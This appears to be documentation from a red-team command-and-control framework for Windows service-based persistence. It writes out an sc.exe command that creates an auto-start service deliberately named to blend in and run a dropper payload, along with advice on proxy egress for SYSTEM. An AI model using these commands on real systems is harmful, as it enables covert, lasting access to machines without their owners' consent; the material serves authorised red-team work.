#############################
  Service Level Persistence
#############################
Mitre ATT&CK - `New Service <https://attack.mitre.org/wiki/Technique/T1050>`_

**Requires: Elevated User**

This persistence requires elevated rights and will create a new service on the system using "sc.exe". The new service is called "CPUpdater" to try and fit in with other service names and not stand out. Before laying this type of persistence you need to understand whether the SYSTEM account is allowed to egress the corporate web proxy, if not you will need to create a Proxy aware payload using the "CreateProxyPayload" command. 

*********************************
Install-ServiceLevel-Persistence
*********************************
To add this persistence use the following command::

	Install-ServiceLevel-Persistence 

Installs a new service called "CPUpdater" using "sc.exe" to run the dropper::

	sc.exe create CPUpdater binpath= 'cmd /c "$payload" Displayname= CheckpointServiceUpdater start= auto

******************************************
Install-ServiceLevel-PersistenceWithProxy
******************************************
This will do the same as above but use the Proxy Aware dropper that will be created by using "CreateProxyPayload".

To add this persistence use the following command::

	Install-ServiceLevel-PersistenceWithProxy

*********************************
Remove-ServiceLevel-Persistence
*********************************
To remove this persistence use the following command::

	Remove-ServiceLevel-Persistence

Removes the service using "sc.exe"::

	sc.exe delete CPUpdater

